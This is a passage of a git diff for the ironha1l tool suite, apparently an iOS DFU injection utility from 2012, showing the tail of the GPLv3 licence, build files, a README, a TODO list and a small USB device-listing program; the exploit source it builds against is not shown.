do, we wish to +avoid the special danger that patents applied to a free program could +make it effectively proprietary. To prevent this, the GPL assures that +patents cannot be used to render the program non-free. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Use with the GNU Affero General Public License. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU Affero General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the special requirements of the GNU Affero General Public License, +section 13, concerning interaction through a network will apply to the +combination as such. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + +Also add information on how to contact you by electronic and paper mail. + + If the program does terminal interaction, make it output a short +notice like this when it starts in an interactive mode: + + Copyright (C) + This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, your program's commands +might be different; for a GUI interface, you would use an "about box". + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU GPL, see +. + + The GNU General Public License does not permit incorporating your program +into proprietary programs. If your program is a subroutine library, you +may consider it more useful to permit linking proprietary applications with +the library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. But first, please read +. diff --git a/Makefile.default b/Makefile.default new file mode 100644 index 0000000..9a0bc4b --- /dev/null +++ b/Makefile.default @@ -0,0 +1,108 @@ +#***************************************************************# +#** This file is part of ironha1l Tool Suite. **# +#** ironha1l, a DFU injector tool for iDevices. **# +#** **# +#** ********************************************************* **# +#** --------------- Updated: Oct-10-2012 -------------------- **# +#** ********************************************************* **# +#** **# +#** Author: Pascal CLEMENT aka Thireus **# +#** **# +#** http://ironha1l.thireus.com **# +#** http://blog.thireus.com **# +#** **# +#** ironha1l Tool Suite, **# +#** Copyright © 2012 Thireus. **# +#***************************************************************# +#**PLEASE REFER TO THE README FILE FOR ADDITIONAL INFORMATION!**# +#***************************************************************# + +PATH_libusb_ironha1l = $(BASEDIR)/libusb_ironha1l/libusb/.libs/ +PATH_usbmuxd_ironha1l = $(BASEDIR)/usbmuxd_ironha1l/build/ +PATH_common = $(BASEDIR)/common/ +PATH_libironha1l = $(BASEDIR)/libironha1l/ +PATH_applications = $(BASEDIR)/applications/ +PATH_limera1n = $(BASEDIR)/limera1n/ + +LIBUSB_IRONHA1L_ = $(PATH_libusb_ironha1l)libusb-1.0 +USBMUXD_IRONHA1L_ = $(PATH_usbmuxd_ironha1l) +LIBIRONHA1L_ = $(PATH_libironha1l)libironha1l +LIMERA1N_ = $(PATH_limera1n)limera1n +IRONHA1L_ = $(PATH_applications)ironha1l +DEVICES_ = $(PATH_applications)devices +COMMON_ = $(PATH_common)common + +LIBUSB_IRONHA1L = $(LIBUSB_IRONHA1L_).a +USBMUXD_IRONHA1L = $(USBMUXD_IRONHA1L_)Makefile +LIBIRONHA1L = $(LIBIRONHA1L_).a +IRONHA1L = $(BASEDIR)/ironha1l +DEVICES = $(BASEDIR)/devices +USBMUXD = $(BASEDIR)/usbmuxd +IPROXY = $(BASEDIR)/iproxy + +CC = gcc +AR = ar + +ARFLAGS = rcs +CFLAGS = -c -Wall -g + +LDFLAGS = -L$(PATH_libironha1l) -lironha1l +LDFLAGSLIBUSB += -L$(PATH_libusb_ironha1l) -lusb-1.0 + +all: $(IRONHA1L) $(DEVICES) $(USBMUXD) $(IPROXY) + +$(LIBUSB_IRONHA1L): + make -C $(BASEDIR)/libusb_ironha1l + +$(USBMUXD_IRONHA1L): $(LIBUSB_IRONHA1L) + cd $(BASEDIR)/usbmuxd_ironha1l/build \ + && cmake .. \ + && cd $(BASEDIR) + +$(USBMUXD): $(USBMUXD_IRONHA1L) + make -C $(BASEDIR)/usbmuxd_ironha1l/build usbmuxd\ + && mv $(BASEDIR)/usbmuxd_ironha1l/build/daemon/usbmuxd $(BASEDIR)/ + +$(IPROXY): $(USBMUXD_IRONHA1L) + make -C $(BASEDIR)/usbmuxd_ironha1l/build iproxy \ + && mv $(BASEDIR)/usbmuxd_ironha1l/build/tools/iproxy $(BASEDIR)/ + +$(LIBIRONHA1L): $(LIBIRONHA1L_).o + $(AR) $(ARFLAGS) $(LIBIRONHA1L) $(LIBIRONHA1L_).o + +$(LIBIRONHA1L_).o: $(LIBIRONHA1L_).c $(LIBIRONHA1L_).h + $(CC) $(CFLAGS) $(LIBIRONHA1L_).c -o $(LIBIRONHA1L_).o + +$(IRONHA1L): $(LIMERA1N_).o $(COMMON_).o $(IRONHA1L_).o $(LIBUSB_IRONHA1L) $(LIBIRONHA1L) + $(CC) $(LIMERA1N_).o $(COMMON_).o $(IRONHA1L_).o $(LDFLAGS) $(LDFLAGSLIBUSB) -o $(IRONHA1L) + +$(IRONHA1L_).o: $(IRONHA1L_).c $(IRONHA1L_).h $(LIBIRONHA1L_).h + $(CC) $(CFLAGS) $(IRONHA1L_).c -o $(IRONHA1L_).o + +$(DEVICES): $(DEVICES_).o $(COMMON_).o $(LIBUSB_IRONHA1L) $(LIBIRONHA1L) + $(CC) $(COMMON_).o $(DEVICES_).o $(LDFLAGS) $(LDFLAGSLIBUSB) -o $(DEVICES) + +$(DEVICES_).o: $(DEVICES_).c $(DEVICES_).h $(LIBIRONHA1L_).h + $(CC) $(CFLAGS) $(DEVICES_).c -o $(DEVICES_).o + +$(COMMON_).o: $(COMMON_).c $(COMMON_).h $(LIBIRONHA1L_).h + $(CC) $(CFLAGS) $(COMMON_).c -o $(COMMON_).o + +$(LIMERA1N_).o: $(LIMERA1N_).c $(LIMERA1N_).h $(LIBIRONHA1L_).h + $(CC) $(CFLAGS) $(LIMERA1N_).c -o $(LIMERA1N_).o + +clean: + rm -rf $(BASEDIR)/*.o + rm -rf $(BASEDIR)/*/*.o + make clean_usbmuxd + make clean_libusb + +clean_libusb: + make -C $(BASEDIR)/libusb_ironha1l clean + +clean_usbmuxd: + rm -rf $(PATH_usbmuxd_ironha1l)* + +mrproper: + rm -rf $(PATH_libusb_ironha1l) $(PATH_usbmuxd_ironha1l)* $(LIBIRONHA1L) $(IRONHA1L) $(DEVICES) $(USBMUXD) $(IPROXY) + make clean diff --git a/README b/README new file mode 100644 index 0000000..875b3be --- /dev/null +++ b/README @@ -0,0 +1,53 @@ +//***************************************************************// +//** This file is part of ironha1l Tool Suite. **// +//** ironha1l, a DFU injector tool for iDevices. **// +//** **// +//** ********************************************************* **// +//** --------------- Updated: Oct-10-2012 -------------------- **// +//** ********************************************************* **// +//** **// +//** Author: Pascal CLEMENT aka Thireus **// +//** **// +//** http://ironha1l.thireus.com **// +//** http://blog.thireus.com **// +//** **// +//** ironha1l Tool Suite, **// +//** Copyright © 2012 Thireus. **// +//***************************************************************// +//**PLEASE REFER TO THE README FILE FOR ADDITIONAL INFORMATION!**// +//***************************************************************// + +*** FOR YOUR INFORMATION *** + +This version of ironha1l is distributed under the terms of GPLv3. + +*** INSTALLATION *** + +PLEASE READ THE INSTALL FILE! + +*** AUTHORS *** + +PLEASE READ THE AUTHORS FILE! + +*** CONTRIBUTE *** + +If you wish to contribute to this project please refer to the +ironha1l website: http://ironha1l.thireus.com + +*** LICENSE *** + +ironha1l, a DFU injector tool for iDevices. +Copyright (C) 2012 Thireus + +This program is free software: you can redistribute it and/or modify +it under the terms of the GNU General Public License as published by +the Free Software Foundation, either version 3 of the License, or +(at your option) any later version. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program. If not, see . diff --git a/TODO b/TODO new file mode 100644 index 0000000..ec419d1 --- /dev/null +++ b/TODO @@ -0,0 +1,24 @@ +//***************************************************************// +//** This file is part of ironha1l Tool Suite. **// +//** ironha1l, a DFU injector tool for iDevices. **// +//** **// +//** ********************************************************* **// +//** --------------- Updated: Oct-10-2012 -------------------- **// +//** ********************************************************* **// +//** **// +//** Author: Pascal CLEMENT aka Thireus **// +//** **// +//** http://ironha1l.thireus.com **// +//** http://blog.thireus.com **// +//** **// +//** ironha1l Tool Suite, **// +//** Copyright © 2012 Thireus. **// +//***************************************************************// +//**PLEASE REFER TO THE README FILE FOR ADDITIONAL INFORMATION!**// +//***************************************************************// + +*** TODO *** + +# Intégrer les patchs pour la version ANDROID +# Ecrire un README compréhensible +# Optimiser la fonction d'extraction du CPID et permettre d'extraire d'autres données. \ No newline at end of file diff --git a/applications/Android.mk b/applications/Android.mk new file mode 100644 index 0000000..b5f9a2f --- /dev/null +++ b/applications/Android.mk @@ -0,0 +1,49 @@ +#***************************************************************# +#** This file is part of ironha1l Tool Suite. **# +#** ironha1l, a DFU injector tool for iDevices. **# +#** **# +#** ********************************************************* **# +#** --------------- Updated: Oct-10-2012 -------------------- **# +#** ********************************************************* **# +#** **# +#** Author: Pascal CLEMENT aka Thireus **# +#** **# +#** http://ironha1l.thireus.com **# +#** http://blog.thireus.com **# +#** **# +#** ironha1l Tool Suite, **# +#** Copyright © 2012 Thireus. **# +#***************************************************************# +#**PLEASE REFER TO THE README FILE FOR ADDITIONAL INFORMATION!**# +#***************************************************************# + +LOCAL_PATH:= $(call my-dir) +include $(CLEAR_VARS) + +LOCAL_SRC_FILES:= \ + ../common/common.c \ + devices.c + +LOCAL_SHARED_LIBRARIES := libc +LOCAL_STATIC_LIBRARIES := libironha1l libusb_ironha1l + +LOCAL_MODULE_TAGS := optional +LOCAL_MODULE:= devices + +include $(BUILD_EXECUTABLE) + + +include $(CLEAR_VARS) + +LOCAL_SRC_FILES:= \ + ../common/common.c \ + ../limera1n/limera1n.c \ + ironha1l.c + +LOCAL_SHARED_LIBRARIES := libc +LOCAL_STATIC_LIBRARIES := libironha1l libusb_ironha1l + +LOCAL_MODULE_TAGS := optional +LOCAL_MODULE:= ironha1l + +include $(BUILD_EXECUTABLE) diff --git a/applications/devices.c b/applications/devices.c new file mode 100644 index 0000000..4327981 --- /dev/null +++ b/applications/devices.c @@ -0,0 +1,34 @@ +//***************************************************************// +//** This file is part of ironha1l Tool Suite. **// +//** ironha1l, a DFU injector tool for iDevices. **// +//** **// +//** ********************************************************* **// +//** --------------- Updated: Oct-10-2012 -------------------- **// +//** ********************************************************* **// +//** **// +//** Author: Pascal CLEMENT aka Thireus **// +//** **// +//** http://ironha1l.thireus.com **// +//** http://blog.thireus.com **// +//** **// +//** ironha1l Tool Suite, **// +//** Copyright © 2012 Thireus. **// +//***************************************************************// +//**PLEASE REFER TO THE README FILE FOR ADDITIONAL INFORMATION!**// +//***************************************************************// + +#include + +#include "devices.h" + +int main(int argc, char *argv[]) +{ + + debug(L0, "[X] PRINTING USB DEVICES...\n"); + + listDevices(); + + debug(L0, "[X] END PRINTING USB DEVICES...\n"); + + return 0; +} diff --git a/applications/devices.h b/applications/devices.h new file mode 100644 index 0000000..b3207b2 --- /dev/null +++ b/applications/devices.h @@ -0,0 +1,20 @@ +//***************************************************************// +//** This file is part of ironha1l Tool Suite. **// +//** ironha1l, a DFU injector tool for iDevices. **// +//** **// +//** ********************************************************* **// +//** --------------- Updated: Oct-10-2012 -------------------- **// +//** ********************************************************* **// +//** **// +//** Author: Pascal CLEMENT aka Thireus **// +//** **// +//** http://ironha1l.thireus.com **// +//** http://blog.thireus.com **// +//** **// +//** ironha1l Tool Suite, **// +//** Copyright © 2012 Thireus. **// +//***************************************************************// +//**PLEASE REFER TO THE README FILE FOR ADDITIONAL INFORMATION!**// +//***************************************************************// + +#include "../libironha1l/libironha1l.h" diff --git a/applications/ironha1l.c b/applications/ironha1l.c new file mode 100644 index 0000000..99fd788 --- /dev/null +++ b/applications/ironha1l.c @@ -0,0 +1,391 @@ +//***************************************************************// +//** This file is part of ironha1l Tool Suite. **// +//** ironha1l, a DFU injector tool for iDevices. **// +//** **// +//** ********************************************************* **// +//** 